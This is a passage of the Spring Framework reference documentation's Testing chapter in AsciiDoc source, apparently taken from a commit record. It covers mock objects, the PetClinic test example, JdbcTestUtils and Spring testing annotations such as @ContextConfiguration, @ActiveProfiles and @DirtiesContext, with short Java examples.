__\"MockRest*\"__. Eclipse users\nshould add `\"MockRestRequestMatchers.{asterisk}\"` and `\"MockRestResponseCreators.{asterisk}\"`\nas \"favorite static members\" in the Eclipse preferences under\n__Java -> Editor -> Content Assist -> Favorites__.\nThat allows using content assist after typing the first character of the\nstatic method name. Other IDEs (e.g. IntelliJ) may not require any additional\nconfiguration. Just check the support for code completion on static members.\n\n[[spring-mvc-test-client-resources]]\n===== Further Examples of Client-side REST Tests\nSpring MVC Test's own tests include\nhttps:\/\/github.com\/spring-projects\/spring-framework\/tree\/master\/spring-test\/src\/test\/java\/org\/springframework\/test\/web\/client\/samples[example\ntests] of client-side REST tests.\n\n\n\n[[testing-examples-petclinic]]\n=== PetClinic Example\n\nThe PetClinic application, available on\nhttps:\/\/github.com\/spring-projects\/spring-petclinic[GitHub], illustrates several features\nof the __Spring TestContext Framework__ in a JUnit 4 environment. Most test functionality\nis included in the `AbstractClinicTests`, for which a partial listing is shown below:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\timport static org.junit.Assert.assertEquals;\n\t\/\/ import ...\n\n\t**@ContextConfiguration**\n\tpublic abstract class AbstractClinicTests **extends AbstractTransactionalJUnit4SpringContextTests** {\n\n\t\t**@Autowired**\n\t\tprotected Clinic clinic;\n\n\t\t@Test\n\t\tpublic void getVets() {\n\t\t\tCollection<Vet> vets = this.clinic.getVets();\n\t\t\tassertEquals(\"JDBC query must show the same number of vets\",\n\t\t\t\t**super.countRowsInTable(\"VETS\")**, vets.size());\n\t\t\tVet v1 = EntityUtils.getById(vets, Vet.class, 2);\n\t\t\tassertEquals(\"Leary\", v1.getLastName());\n\t\t\tassertEquals(1, v1.getNrOfSpecialties());\n\t\t\tassertEquals(\"radiology\", (v1.getSpecialties().get(0)).getName());\n\t\t\t\/\/ ...\n\t\t}\n\n\t\t\/\/ ...\n\t}\n----\n\nNotes:\n\n* This test case extends the `AbstractTransactionalJUnit4SpringContextTests` class, from\n which it inherits configuration for Dependency Injection (through the\n `DependencyInjectionTestExecutionListener`) and transactional behavior (through the\n `TransactionalTestExecutionListener`).\n* The `clinic` instance variable -- the application object being tested -- is set by\n Dependency Injection through `@Autowired` semantics.\n* The `getVets()` method illustrates how you can use the inherited `countRowsInTable()`\n method to easily verify the number of rows in a given table, thus verifying correct\n behavior of the application code being tested. This allows for stronger tests and\n lessens dependency on the exact test data. For example, you can add additional rows in\n the database without breaking tests.\n* Like many integration tests that use a database, most of the tests in\n `AbstractClinicTests` depend on a minimum amount of data already in the database before\n the test cases run. Alternatively, you might choose to populate the database within the\n test fixture set up of your test cases -- again, within the same transaction as the\n tests.\n\nThe PetClinic application supports three data access technologies: JDBC, Hibernate, and\nJPA. By declaring `@ContextConfiguration` without any specific resource locations, the\n`AbstractClinicTests` class will have its application context loaded from the default\nlocation, `AbstractClinicTests-context.xml`, which declares a common `DataSource`.\nSubclasses specify additional context locations that must declare a\n`PlatformTransactionManager` and a concrete implementation of `Clinic`.\n\nFor example, the Hibernate implementation of the PetClinic tests contains the following\nimplementation. For this example, `HibernateClinicTests` does not contain a single line\nof code: we only need to declare `@ContextConfiguration`, and the tests are inherited\nfrom `AbstractClinicTests`. Because `@ContextConfiguration` is declared without any\nspecific resource locations, the __Spring TestContext Framework__ loads an application\ncontext from all the beans defined in `AbstractClinicTests-context.xml` (i.e., the\ninherited locations) and `HibernateClinicTests-context.xml`, with\n`HibernateClinicTests-context.xml` possibly overriding beans defined in\n`AbstractClinicTests-context.xml`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@ContextConfiguration**\n\tpublic class HibernateClinicTests extends AbstractClinicTests { }\n----\n\nIn a large-scale application, the Spring configuration is often split across multiple\nfiles. Consequently, configuration locations are typically specified in a common base\nclass for all application-specific integration tests. Such a base class may also add\nuseful instance variables -- populated by Dependency Injection, naturally -- such as a\n`SessionFactory` in the case of an application using Hibernate.\n\nAs far as possible, you should have exactly the same Spring configuration files in your\nintegration tests as in the deployed environment. One likely point of difference\nconcerns database connection pooling and transaction infrastructure. If you are\ndeploying to a full-blown application server, you will probably use its connection pool\n(available through JNDI) and JTA implementation. Thus in production you will use a\n`JndiObjectFactoryBean` or `<jee:jndi-lookup>` for the `DataSource` and\n`JtaTransactionManager`. JNDI and JTA will not be available in out-of-container\nintegration tests, so you should use a combination like the Commons DBCP\n`BasicDataSource` and `DataSourceTransactionManager` or `HibernateTransactionManager`\nfor them. You can factor out this variant behavior into a single XML file, having the\nchoice between application server and a 'local' configuration separated from all other\nconfiguration, which will not vary between the test and production environments. In\naddition, it is advisable to use properties files for connection settings. See the\nPetClinic application for an example.\n\n\n\n\n[[testing-resources]]\n== Further Resources\nConsult the following resources for more information about testing:\n\n* http:\/\/www.junit.org\/[JUnit]: \"__A programmer-oriented testing framework for Java__\".\n Used by the Spring Framework in its test suite.\n* http:\/\/testng.org\/[TestNG]: A testing framework inspired by JUnit with added support\n for annotations, test groups, data-driven testing, distributed testing, etc.\n* http:\/\/joel-costigliola.github.io\/assertj\/[AssertJ]: \"__Fluent assertions for Java__\"\n including support for Java 8 lambdas, streams, etc.\n* http:\/\/en.wikipedia.org\/wiki\/Mock_Object[Mock Objects]: Article in Wikipedia.\n* http:\/\/www.mockobjects.com\/[MockObjects.com]: Web site dedicated to mock objects, a\n technique for improving the design of code within test-driven development.\n* http:\/\/mockito.org\/[Mockito]: Java mock library based on the\n http:\/\/xunitpatterns.com\/Test%20Spy.html[test spy] pattern.\n* http:\/\/www.easymock.org\/[EasyMock]: Java library \"__that provides Mock Objects for\n interfaces (and objects through the class extension) by generating them on the fly\n using Java's proxy mechanism.__\" Used by the Spring Framework in its test suite.\n* http:\/\/www.jmock.org\/[JMock]: Library that supports test-driven development of Java\n code with mock objects.\n* http:\/\/dbunit.sourceforge.net\/[DbUnit]: JUnit extension (also usable with Ant and\n Maven) targeted for database-driven projects that, among other things, puts your\n database into a known state between test runs.\n* http:\/\/grinder.sourceforge.net\/[The Grinder]: Java load testing framework.\n\n","old_contents":"[[testing]]\n= Testing\n:doc-root: https:\/\/docs.spring.io\n:api-spring-framework: {doc-root}\/spring-framework\/docs\/{spring-version}\/javadoc-api\/org\/springframework\n:doc-spring-boot: {doc-root}\/spring-boot\/docs\/current\/reference\n:toc: left\n:toclevels: 2\n:docinfo1:\n\nThe adoption of the test-driven-development (TDD) approach to software\ndevelopment is certainly advocated by the Spring team, and so coverage of Spring's\nsupport for integration testing is covered (alongside best practices for unit testing).\nThe Spring team has found that the correct use of IoC certainly does make both unit and\nintegration testing easier (in that the presence of setter methods and appropriate\nconstructors on classes makes them easier to wire together in a test without having to\nset up service locator registries and suchlike)... the chapter dedicated solely to\ntesting will hopefully convince you of this as well.\n\n\n[[testing-introduction]]\n== Introduction to Spring Testing\nTesting is an integral part of enterprise software development. This chapter focuses on\nthe value-add of the IoC principle to <<unit-testing,unit testing>> and on the benefits\nof the Spring Framework's support for <<integration-testing,integration testing>>. __(A\nthorough treatment of testing in the enterprise is beyond the scope of this reference\nmanual.)__\n\n\n[[unit-testing]]\n== Unit Testing\nDependency Injection should make your code less dependent on the container than it would\nbe with traditional Java EE development. The POJOs that make up your application should\nbe testable in JUnit or TestNG tests, with objects simply instantiated using the `new`\noperator, __without Spring or any other container__. You can use <<mock-objects,mock\nobjects>> (in conjunction with other valuable testing techniques) to test your code in\nisolation. If you follow the architecture recommendations for Spring, the resulting\nclean layering and componentization of your codebase will facilitate easier unit\ntesting. For example, you can test service layer objects by stubbing or mocking DAO or\nRepository interfaces, without needing to access persistent data while running unit\ntests.\n\nTrue unit tests typically run extremely quickly, as there is no runtime infrastructure\nto set up. Emphasizing true unit tests as part of your development methodology will\nboost your productivity. You may not need this section of the testing chapter to help\nyou write effective unit tests for your IoC-based applications. For certain unit testing\nscenarios, however, the Spring Framework provides the following mock objects and testing\nsupport classes.\n\n\n\n[[mock-objects]]\n=== Mock Objects\n\n\n[[mock-objects-env]]\n==== Environment\nThe `org.springframework.mock.env` package contains mock implementations of the\n`Environment` and `PropertySource` abstractions (see\n<<core.adoc#beans-definition-profiles, Bean definition profiles>>\nand <<core.adoc#beans-property-source-abstraction, PropertySource abstraction>>).\n`MockEnvironment` and `MockPropertySource` are useful for developing\n__out-of-container__ tests for code that depends on environment-specific properties.\n\n\n[[mock-objects-jndi]]\n==== JNDI\nThe `org.springframework.mock.jndi` package contains an implementation of the JNDI SPI,\nwhich you can use to set up a simple JNDI environment for test suites or stand-alone\napplications. If, for example, JDBC ``DataSource``s get bound to the same JNDI names in\ntest code as within a Java EE container, you can reuse both application code and\nconfiguration in testing scenarios without modification.\n\n\n[[mock-objects-servlet]]\n==== Servlet API\nThe `org.springframework.mock.web` package contains a comprehensive set of Servlet API\nmock objects, which are useful for testing web contexts, controllers, and filters. These\nmock objects are targeted at usage with Spring's Web MVC framework and are generally more\nconvenient to use than dynamic mock objects such as http:\/\/www.easymock.org[EasyMock] or\nalternative Servlet API mock objects such as http:\/\/www.mockobjects.com[MockObjects]. Since\nSpring Framework 5.0, the set of mocks in the `org.springframework.mock.web` package is\nbased on the Servlet 4.0 API.\n\nFor thorough integration testing of your Spring MVC and REST ``Controller``s in\nconjunction with your `WebApplicationContext` configuration for Spring MVC, see the\n<<spring-mvc-test-framework,_Spring MVC Test Framework_>>.\n\n\n\n[[unit-testing-support-classes]]\n=== Unit Testing support Classes\n\n\n[[unit-testing-utilities]]\n==== General testing utilities\nThe `org.springframework.test.util` package contains several general purpose utilities\nfor use in unit and integration testing.\n\n`ReflectionTestUtils` is a collection of reflection-based utility methods. Developers use\nthese methods in testing scenarios where they need to change the value of a constant, set\na non-`public` field, invoke a non-`public` setter method, or invoke a non-`public`\n_configuration_ or _lifecycle_ callback method when testing application code involving\nuse cases such as the following.\n\n* ORM frameworks such as JPA and Hibernate that condone `private` or `protected` field\n access as opposed to `public` setter methods for properties in a domain entity.\n* Spring's support for annotations such as `@Autowired`, `@Inject`, and `@Resource`,\n which provides dependency injection for `private` or `protected` fields, setter\n methods, and configuration methods.\n* Use of annotations such as `@PostConstruct` and `@PreDestroy` for lifecycle callback\n methods.\n\n`AopTestUtils` is a collection of AOP-related utility methods. These methods can be used\nto obtain a reference to the underlying target object hidden behind one or more Spring\nproxies. For example, if you have configured a bean as a dynamic mock using a library\nlike EasyMock or Mockito and the mock is wrapped in a Spring proxy, you may need direct\naccess to the underlying mock in order to configure expectations on it and perform\nverifications. For Spring's core AOP utilities, see `AopUtils` and `AopProxyUtils`.\n\n\n\n[[unit-testing-spring-mvc]]\n==== Spring MVC\nThe `org.springframework.test.web` package contains `ModelAndViewAssert`, which you can\nuse in combination with JUnit, TestNG, or any other testing framework for unit tests\ndealing with Spring MVC `ModelAndView` objects.\n\n.Unit testing Spring MVC Controllers\n[TIP]\n====\nTo unit test your Spring MVC ``Controller``s as POJOs, use `ModelAndViewAssert` combined\nwith `MockHttpServletRequest`, `MockHttpSession`, and so on from Spring's\n<<mock-objects-servlet, Servlet API mocks>>. For thorough integration testing of your\nSpring MVC and REST ``Controller``s in conjunction with your `WebApplicationContext`\nconfiguration for Spring MVC, use the <<spring-mvc-test-framework,_Spring MVC Test\nFramework_>> instead.\n====\n\n\n\n\n[[integration-testing]]\n== Integration Testing\n\n\n\n[[integration-testing-overview]]\n=== Overview\nIt is important to be able to perform some integration testing without requiring\ndeployment to your application server or connecting to other enterprise infrastructure.\nThis will enable you to test things such as:\n\n* The correct wiring of your Spring IoC container contexts.\n* Data access using JDBC or an ORM tool. This would include such things as the\n correctness of SQL statements, Hibernate queries, JPA entity mappings, etc.\n\nThe Spring Framework provides first-class support for integration testing in the\n`spring-test` module. The name of the actual JAR file might include the release version\nand might also be in the long `org.springframework.test` form, depending on where you\nget it from (see the <<core.adoc#dependency-management,section on Dependency Management>> for an\nexplanation). This library includes the `org.springframework.test` package, which\ncontains valuable classes for integration testing with a Spring container. This testing\ndoes not rely on an application server or other deployment environment. Such tests are\nslower to run than unit tests but much faster than the equivalent Selenium tests or remote\ntests that rely on deployment to an application server.\n\nIn Spring 2.5 and later, unit and integration testing support is provided in the form of\nthe annotation-driven <<testcontext-framework,Spring TestContext Framework>>. The\nTestContext framework is agnostic of the actual testing framework in use, thus allowing\ninstrumentation of tests in various environments including JUnit, TestNG, and so on.\n\n\n\n[[integration-testing-goals]]\n=== Goals of Integration Testing\nSpring's integration testing support has the following primary goals:\n\n* To manage <<testing-ctx-management,Spring IoC container caching>> between test\n execution.\n* To provide <<testing-fixture-di,Dependency Injection of test fixture instances>>.\n* To provide <<testing-tx,transaction management>> appropriate to integration testing.\n* To supply <<testing-support-classes,Spring-specific base classes>> that assist\n developers in writing integration tests.\n\nThe next few sections describe each goal and provide links to implementation and\nconfiguration details.\n\n\n[[testing-ctx-management]]\n==== Context management and caching\nThe Spring TestContext Framework provides consistent loading of Spring\n``ApplicationContext``s and ``WebApplicationContext``s as well as caching of those\ncontexts. Support for the caching of loaded contexts is important, because startup time\ncan become an issue -- not because of the overhead of Spring itself, but because the\nobjects instantiated by the Spring container take time to instantiate. For example, a\nproject with 50 to 100 Hibernate mapping files might take 10 to 20 seconds to load the\nmapping files, and incurring that cost before running every test in every test fixture\nleads to slower overall test runs that reduce developer productivity.\n\nTest classes typically declare either an array of __resource locations__ for XML or Groovy\nconfiguration metadata -- often in the classpath -- or an array of __annotated classes__\nthat is used to configure the application. These locations or classes are the same as or\nsimilar to those specified in `web.xml` or other configuration files for production\ndeployments.\n\nBy default, once loaded, the configured `ApplicationContext` is reused for each test.\nThus the setup cost is incurred only once per test suite, and subsequent test execution\nis much faster. In this context, the term __test suite__ means all tests run in the same\nJVM -- for example, all tests run from an Ant, Maven, or Gradle build for a given\nproject or module. In the unlikely case that a test corrupts the application context and\nrequires reloading -- for example, by modifying a bean definition or the state of an\napplication object -- the TestContext framework can be configured to reload the\nconfiguration and rebuild the application context before executing the next test.\n\nSee <<testcontext-ctx-management>> and <<testcontext-ctx-management-caching>> with the\nTestContext framework.\n\n\n[[testing-fixture-di]]\n==== Dependency Injection of test fixtures\nWhen the TestContext framework loads your application context, it can optionally\nconfigure instances of your test classes via Dependency Injection. This provides a\nconvenient mechanism for setting up test fixtures using preconfigured beans from your\napplication context. A strong benefit here is that you can reuse application contexts\nacross various testing scenarios (e.g., for configuring Spring-managed object graphs,\ntransactional proxies, ``DataSource``s, etc.), thus avoiding the need to duplicate\ncomplex test fixture setup for individual test cases.\n\nAs an example, consider the scenario where we have a class, `HibernateTitleRepository`,\nthat implements data access logic for a `Title` domain entity. We want to write\nintegration tests that test the following areas:\n\n* The Spring configuration: basically, is everything related to the configuration of the\n `HibernateTitleRepository` bean correct and present?\n* The Hibernate mapping file configuration: is everything mapped correctly, and are the\n correct lazy-loading settings in place?\n* The logic of the `HibernateTitleRepository`: does the configured instance of this\n class perform as anticipated?\n\nSee dependency injection of test fixtures with the <<testcontext-fixture-di,TestContext\nframework>>.\n\n\n[[testing-tx]]\n==== Transaction management\nOne common issue in tests that access a real database is their effect on the state of\nthe persistence store. Even when you're using a development database, changes to the\nstate may affect future tests. Also, many operations -- such as inserting or modifying\npersistent data -- cannot be performed (or verified) outside a transaction.\n\nThe TestContext framework addresses this issue. By default, the framework will create\nand roll back a transaction for each test. You simply write code that can assume the\nexistence of a transaction. If you call transactionally proxied objects in your tests,\nthey will behave correctly, according to their configured transactional semantics. In\naddition, if a test method deletes the contents of selected tables while running within\nthe transaction managed for the test, the transaction will roll back by default, and the\ndatabase will return to its state prior to execution of the test. Transactional support\nis provided to a test via a `PlatformTransactionManager` bean defined in the test's\napplication context.\n\nIf you want a transaction to commit -- unusual, but occasionally useful when you want a\nparticular test to populate or modify the database -- the TestContext framework can be\ninstructed to cause the transaction to commit instead of roll back via the\n<<integration-testing-annotations, `@Commit`>> annotation.\n\nSee transaction management with the <<testcontext-tx,TestContext framework>>.\n\n\n[[testing-support-classes]]\n==== Support classes for integration testing\nThe Spring TestContext Framework provides several `abstract` support classes that\nsimplify the writing of integration tests. These base test classes provide well-defined\nhooks into the testing framework as well as convenient instance variables and methods,\nwhich enable you to access:\n\n* The `ApplicationContext`, for performing explicit bean lookups or testing the state of\n the context as a whole.\n* A `JdbcTemplate`, for executing SQL statements to query the database. Such queries can\n be used to confirm database state both __prior to__ and __after__ execution of\n database-related application code, and Spring ensures that such queries run in the\n scope of the same transaction as the application code. When used in conjunction with\n an ORM tool, be sure to avoid <<testcontext-tx-false-positives,false positives>>.\n\nIn addition, you may want to create your own custom, application-wide superclass with\ninstance variables and methods specific to your project.\n\nSee support classes for the <<testcontext-support-classes,TestContext framework>>.\n\n\n\n[[integration-testing-support-jdbc]]\n=== JDBC Testing Support\nThe `org.springframework.test.jdbc` package contains `JdbcTestUtils`, which is a\ncollection of JDBC related utility functions intended to simplify standard database\ntesting scenarios. Specifically, `JdbcTestUtils` provides the following static utility\nmethods.\n\n* `countRowsInTable(..)`: counts the number of rows in the given table\n* `countRowsInTableWhere(..)`: counts the number of rows in the given table, using\nthe provided `WHERE` clause\n* `deleteFromTables(..)`: deletes all rows from the specified tables\n* `deleteFromTableWhere(..)`: deletes rows from the given table, using the provided\n`WHERE` clause\n* `dropTables(..)`: drops the specified tables\n\n__Note that <<testcontext-support-classes-junit4,\n`AbstractTransactionalJUnit4SpringContextTests`>> and\n<<testcontext-support-classes-testng, `AbstractTransactionalTestNGSpringContextTests`>>\nprovide convenience methods which delegate to the aforementioned methods in\n`JdbcTestUtils`.__\n\nThe `spring-jdbc` module provides support for configuring and launching an embedded\ndatabase which can be used in integration tests that interact with a database. For\ndetails, see <<data-access.adoc#jdbc-embedded-database-support, Embedded database support>>\nand <<data-access.adoc#jdbc-embedded-database-dao-testing, Testing data access logic\nwith an embedded database>>.\n\n\n\n[[integration-testing-annotations]]\n=== Annotations\n\n\n[[integration-testing-annotations-spring]]\n==== Spring Testing Annotations\nThe Spring Framework provides the following set of __Spring-specific__ annotations that\nyou can use in your unit and integration tests in conjunction with the TestContext\nframework. Refer to the corresponding javadocs for further information, including\ndefault attribute values, attribute aliases, and so on.\n\n===== @BootstrapWith\n`@BootstrapWith` is a class-level annotation that is used to configure how the _Spring\nTestContext Framework_ is bootstrapped. Specifically, `@BootstrapWith` is used to specify\na custom `TestContextBootstrapper`. Consult the <<testcontext-bootstrapping,Bootstrapping\nthe TestContext framework>> section for further details.\n\n===== @ContextConfiguration\n`@ContextConfiguration` defines class-level metadata that is used to determine how to\nload and configure an `ApplicationContext` for integration tests. Specifically,\n`@ContextConfiguration` declares the application context resource `locations` or the\nannotated `classes` that will be used to load the context.\n\nResource locations are typically XML configuration files or Groovy scripts located in\nthe classpath; whereas, annotated classes are typically `@Configuration` classes. However,\nresource locations can also refer to files and scripts in the file system, and annotated\nclasses can be component classes, etc.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@ContextConfiguration**(\"\/test-config.xml\")\n\tpublic class XmlApplicationContextTests {\n\t\t\/\/ class body...\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@ContextConfiguration**(**classes** = TestConfig.class)\n\tpublic class ConfigClassApplicationContextTests {\n\t\t\/\/ class body...\n\t}\n----\n\nAs an alternative or in addition to declaring resource locations or annotated classes,\n`@ContextConfiguration` may be used to declare `ApplicationContextInitializer` classes.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@ContextConfiguration**(**initializers** = CustomContextIntializer.class)\n\tpublic class ContextInitializerTests {\n\t\t\/\/ class body...\n\t}\n----\n\n`@ContextConfiguration` may optionally be used to declare the `ContextLoader` strategy\nas well. Note, however, that you typically do not need to explicitly configure the\nloader since the default loader supports either resource `locations` or annotated\n`classes` as well as `initializers`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@ContextConfiguration**(**locations** = \"\/test-context.xml\", **loader** = CustomContextLoader.class)\n\tpublic class CustomLoaderXmlApplicationContextTests {\n\t\t\/\/ class body...\n\t}\n----\n\n[NOTE]\n====\n`@ContextConfiguration` provides support for __inheriting__ resource locations or\nconfiguration classes as well as context initializers declared by superclasses by\ndefault.\n====\n\nSee <<testcontext-ctx-management>> and the `@ContextConfiguration` javadocs for\nfurther details.\n\n===== @WebAppConfiguration\n`@WebAppConfiguration` is a class-level annotation that is used to declare that the\n`ApplicationContext` loaded for an integration test should be a `WebApplicationContext`.\nThe mere presence of `@WebAppConfiguration` on a test class ensures that a\n`WebApplicationContext` will be loaded for the test, using the default value of\n`\"file:src\/main\/webapp\"` for the path to the root of the web application (i.e., the\n__resource base path__). The resource base path is used behind the scenes to create a\n`MockServletContext` which serves as the `ServletContext` for the test's\n`WebApplicationContext`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t**@WebAppConfiguration**\n\tpublic class WebAppTests {\n\t\t\/\/ class body...\n\t}\n----\n\nTo override the default, specify a different base resource path via the __implicit__\n`value` attribute. Both `classpath:` and `file:` resource prefixes are supported. If no\nresource prefix is supplied the path is assumed to be a file system resource.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t**@WebAppConfiguration(\"classpath:test-web-resources\")**\n\tpublic class WebAppTests {\n\t\t\/\/ class body...\n\t}\n----\n\nNote that `@WebAppConfiguration` must be used in conjunction with\n`@ContextConfiguration`, either within a single test class or within a test class\nhierarchy. See the `@WebAppConfiguration` javadocs for further details.\n\n===== @ContextHierarchy\n`@ContextHierarchy` is a class-level annotation that is used to define a hierarchy of\n``ApplicationContext``s for integration tests. `@ContextHierarchy` should be declared\nwith a list of one or more `@ContextConfiguration` instances, each of which defines a\nlevel in the context hierarchy. The following examples demonstrate the use of\n`@ContextHierarchy` within a single test class; however, `@ContextHierarchy` can also be\nused within a test class hierarchy.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextHierarchy({\n\t\t@ContextConfiguration(\"\/parent-config.xml\"),\n\t\t@ContextConfiguration(\"\/child-config.xml\")\n\t})\n\tpublic class ContextHierarchyTests {\n\t\t\/\/ class body...\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@WebAppConfiguration\n\t@ContextHierarchy({\n\t\t@ContextConfiguration(classes = AppConfig.class),\n\t\t@ContextConfiguration(classes = WebConfig.class)\n\t})\n\tpublic class WebIntegrationTests {\n\t\t\/\/ class body...\n\t}\n----\n\nIf you need to merge or override the configuration for a given level of the context\nhierarchy within a test class hierarchy, you must explicitly name that level by\nsupplying the same value to the `name` attribute in `@ContextConfiguration` at each\ncorresponding level in the class hierarchy. See\n<<testcontext-ctx-management-ctx-hierarchies>> and the `@ContextHierarchy` javadocs\nfor further examples.\n\n===== @ActiveProfiles\n`@ActiveProfiles` is a class-level annotation that is used to declare which __bean\ndefinition profiles__ should be active when loading an `ApplicationContext` for an\nintegration test.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t**@ActiveProfiles**(\"dev\")\n\tpublic class DeveloperTests {\n\t\t\/\/ class body...\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t**@ActiveProfiles**({\"dev\", \"integration\"})\n\tpublic class DeveloperIntegrationTests {\n\t\t\/\/ class body...\n\t}\n----\n\n[NOTE]\n====\n`@ActiveProfiles` provides support for __inheriting__ active bean definition profiles\ndeclared by superclasses by default. It is also possible to resolve active bean\ndefinition profiles programmatically by implementing a custom\n<<testcontext-ctx-management-env-profiles-ActiveProfilesResolver,`ActiveProfilesResolver`>>\nand registering it via the `resolver` attribute of `@ActiveProfiles`.\n====\n\nSee <<testcontext-ctx-management-env-profiles>> and the `@ActiveProfiles` javadocs\nfor examples and further details.\n\n===== @TestPropertySource\n`@TestPropertySource` is a class-level annotation that is used to configure the locations\nof properties files and inlined properties to be added to the set of `PropertySources` in\nthe `Environment` for an `ApplicationContext` loaded for an integration test.\n\nTest property sources have higher precedence than those loaded from the operating\nsystem's environment or Java system properties as well as property sources added by the\napplication declaratively via `@PropertySource` or programmatically. Thus, test property\nsources can be used to selectively override properties defined in system and application\nproperty sources. Furthermore, inlined properties have higher precedence than properties\nloaded from resource locations.\n\nThe following example demonstrates how to declare a properties file from the classpath.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t**@TestPropertySource**(\"\/test.properties\")\n\tpublic class MyIntegrationTests {\n\t\t\/\/ class body...\n\t}\n----\n\nThe following example demonstrates how to declare _inlined_ properties.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t**@TestPropertySource**(properties = { \"timezone = GMT\", \"port: 4242\" })\n\tpublic class MyIntegrationTests {\n\t\t\/\/ class body...\n\t}\n----\n\n===== @DirtiesContext\n`@DirtiesContext` indicates that the underlying Spring `ApplicationContext` has been\n__dirtied__ during the execution of a test (i.e., modified or corrupted in some manner --\nfor example, by changing the state of a singleton bean) and should be closed. When an\napplication context is marked __dirty__, it is removed from the testing framework's cache\nand closed. As a consequence, the underlying Spring container will be rebuilt for any\nsubsequent test that requires a context with the same configuration metadata.\n\n`@DirtiesContext` can be used as both a class-level and method-level annotation within\nthe same class or class hierarchy. In such scenarios, the `ApplicationContext` is marked\nas __dirty__ before or after any such annotated method as well as before or after the\ncurrent test class, depending on the configured `methodMode` and `classMode`.\n\nThe following examples explain when the context would be dirtied for various\nconfiguration scenarios:\n\n* Before the current test class, when declared on a class with class mode set to\n`BEFORE_CLASS`.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@DirtiesContext(classMode = BEFORE_CLASS)**\n\tpublic class FreshContextTests {\n\t\t\/\/ some tests that require a new Spring container\n\t}\n----\n\n+\n\n* After the current test class, when declared on a class with class mode set to\n`AFTER_CLASS` (i.e., the default class mode).\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@DirtiesContext**\n\tpublic class ContextDirtyingTests {\n\t\t\/\/ some tests that result in the Spring container being dirtied\n\t}\n----\n\n+\n\n* Before each test method in the current test class, when declared on a class with class\nmode set to `BEFORE_EACH_TEST_METHOD.`\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@DirtiesContext(classMode = BEFORE_EACH_TEST_METHOD)**\n\tpublic class FreshContextTests {\n\t\t\/\/ some tests that require a new Spring container\n\t}\n----\n\n+\n\n* After each test method in the current test class, when declared on a class with class\nmode set to `AFTER_EACH_TEST_METHOD.`\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@DirtiesContext(classMode = AFTER_EACH_TEST_METHOD)**\n\tpublic class ContextDirtyingTests {\n\t\t\/\/ some tests that result in the Spring container being dirtied\n\t}\n----\n\n+\n\n* Before the current test, when declared on a method with the method mode set to\n`BEFORE_METHOD`.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@DirtiesContext(methodMode = BEFORE_METHOD)**\n\t@Test\n\tpublic void testProcessWhichRequiresFreshAppCtx() {\n\t\t\/\/ some logic that requires a new Spring container\n\t}\n----\n\n+\n\n* After the current test, when declared on a method with the method mode set to\n`AFTER_METHOD` (i.e., the default method mode).\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@DirtiesContext**\n\t@Test\n\tpublic void testProcessWhichDirtiesAppCtx() {\n\t\t\/\/ some logic that results in the Spring container being dirtied\n\t}\n----\n\nIf `@DirtiesContext` is used in a test whose context is configured as part of a context\nhierarchy via `@ContextHierarchy`, the `hierarchyMode` flag can be used to control how\nthe context cache is cleared. By default an __exhaustive__ algorithm will be used that\nclears the context cache including not only the current level but also all other context\nhierarchies that share an ancestor context common to the current test; all\n``ApplicationContext``s that reside in a sub-hierarchy of the common ancestor context\nwill be removed from the context cache and closed. If the __exhaustive__ algorithm is\noverkill for a particular use case, the simpler __current level__ algorithm can be\nspecified instead, as seen below.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextHierarchy({\n\t\t@ContextConfiguration(\"\/parent-config.xml\"),\n\t\t@ContextConfiguration(\"\/child-config.xml\")\n\t})\n\tpublic class BaseTests {\n\t\t\/\/ class body...\n\t}\n\n\tpublic class ExtendedTests extends BaseTests {\n\n\t\t@Test\n\t\t@DirtiesContext(**hierarchyMode = CURRENT_LEVEL**)\n\t\tpublic void test() {\n\t\t\t\/\/ some logic that results in the child context being dirtied\n\t\t}\n\t}\n----\n\nFor further details regarding the `EXHAUSTIVE` and `CURRENT_LEVEL` algorithms see the\n`DirtiesContext.HierarchyMode` javadocs.\n\n===== @TestExecutionListeners\n`@TestExecutionListeners` defines class-level metadata for configuring the\n`TestExecutionListener` implementations that should be registered with the\n`TestContextManager`. Typically, `@TestExecutionListeners` is used in conjunction with\n`@ContextConfiguration`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t**@TestExecutionListeners**({CustomTestExecutionListener.class, AnotherTestExecutionListener.class})\n\tpublic class CustomTestExecutionListenerTests {\n\t\t\/\/ class body...\n\t}\n----\n\n`@TestExecutionListeners` supports _inherited_ listeners by default. See the javadocs\nfor an example and further details.\n\n===== @Commit\n`@Commit` indicates that the transaction for a transactional test method should be\n__committed__ after the test method has completed. `@Commit` can be used as a direct\nreplacement for `@Rollback(false)` in order to more explicitly convey the intent of the\ncode. Analogous to `@Rollback`, `@Commit` may also be declared as a class-level or\nmethod-level 